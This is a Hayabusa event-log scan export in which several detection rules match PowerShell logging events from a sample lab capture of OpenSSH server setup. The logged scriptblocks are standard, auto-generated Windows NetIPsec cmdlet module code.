$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH 
server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function 
@() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
